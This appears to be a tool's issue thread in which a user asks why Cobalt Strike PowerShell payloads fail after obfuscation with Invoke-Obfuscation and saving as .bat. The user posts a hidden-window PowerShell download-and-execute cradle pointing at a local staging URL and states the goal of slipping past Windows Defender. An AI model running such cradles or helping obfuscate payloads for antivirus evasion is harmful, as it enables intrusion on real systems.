Invoke obsfucation messes up payload

[killercoderz4]

I built two payloads with cobalt strike. A standard powershell payload and a scripted web delivery power shell payload. Now here is the challenge, before obfuscation , I tested it on a VMware and it works . after obfuscation I saved it as test.bat and tested it , it doesn't stage or run anymore. I followed the steps and used bxor to obfuscate without any single error .please any help would be appreciated, my out put files are in.bat format

[danielbohannon]

Can you paste a sample? Are you adding any LAUNCHER options from Invoke-Obfsucation? simply adding "powershell.exe " before output will not properly escape certain characters, but adding any of the LAUNCHER options will.

That being said, .bat files require additional escaping that is not in the scope of Invoke-Obfuscation. Namely, certain percent characters in relationship to variables need to be replaced with two percent characters. But again, escaping specific to .bat files falls outside the scope of Invoke-Obfuscation.

[killercoderz4]

@danielbohannon Thanks for the feedback.sorry for the late reply.here is the format powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://127.0.0.1:8080/g'))"

that the onliner i wanted to obfuscate. i test it on my local vm but it doesnt work after obfuscation.i hope there is away around it. because in plain text my windows defender detects and removes most of my test payloads.

[cobbr]

@killercoderz4 If you are still having issues, it would probably help to post the obfuscation command you are using as well as the obfuscated output.